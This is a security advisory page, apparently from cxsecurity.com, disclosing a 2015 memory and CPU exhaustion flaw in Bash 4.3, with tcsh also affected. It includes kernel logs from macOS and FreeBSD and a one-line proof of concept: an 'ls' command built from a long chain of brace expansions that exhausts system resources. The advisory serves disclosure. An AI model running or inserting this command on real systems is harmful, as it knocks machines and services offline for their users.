Bash 4.3 uncontrolled resources exhaustion

2015.04.26
Credit: Maksymilian Arciemowicz
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: CWE-399

Bash 4.3 uncontrolled resources exhaustion ------------------------------------------------------------- Date: 26.04.2015 Credit: Maksymilian Arciemowicz from cxsecurity.com Issue type: CWE-399 Resource exhaustion ------------------------------------------------------------- ============================================================= Description: Memory and cpu exhaustion vulnerability has been defined in extracting specially crafted string before use in bash. ============================================================= Symptoms: Observed memory exhaustion in kernel_task and bash process under MacOSX 10.10.3 ------------------------------------------------------------- 0 kernel_task 236.0 04:17.95 170/10 0 2 9028M+ 0B 0B 0 0 running... 623 bash 15.6 02:08.22 1 0 15 3331M- 0B 31G+ 623 622 stuck... ------------------------------------------------------------- Under freebsd, ------------------------------------------------------------- Apr 26 12:25:43 kernel: swap_pager_getswapspace(16): failed Apr 26 12:25:43 kernel: pid 771 (bash), uid 1001, was killed: out of swap space ------------------------------------------------------------- and also exhaustion for tcsh ------------------------------------------------------------- Apr 26 12:22:35 kernel: swap_pager_getswapspace(16): failed Apr 26 12:22:35 last message repeated 3 times Apr 26 12:22:35 kernel: pid 749 (tcsh), uid 1001, was killed: out of swap space ------------------------------------------------------------- ============================================================= PoC: # ls .{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250} ============================================================= Prevention: If resource exhaustion occur, kill parent process or restart services such as httpd etc ============================================================= Credit: Flaw disclosed by Maksymilian Arciemowicz from cxsecurity and cifrex Team. Follow our new bugtraq https://cxsecurity.com

References:

https://cxsecurity.com
http://cvemap.org
http://cifrex.org
http://cert.cx


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top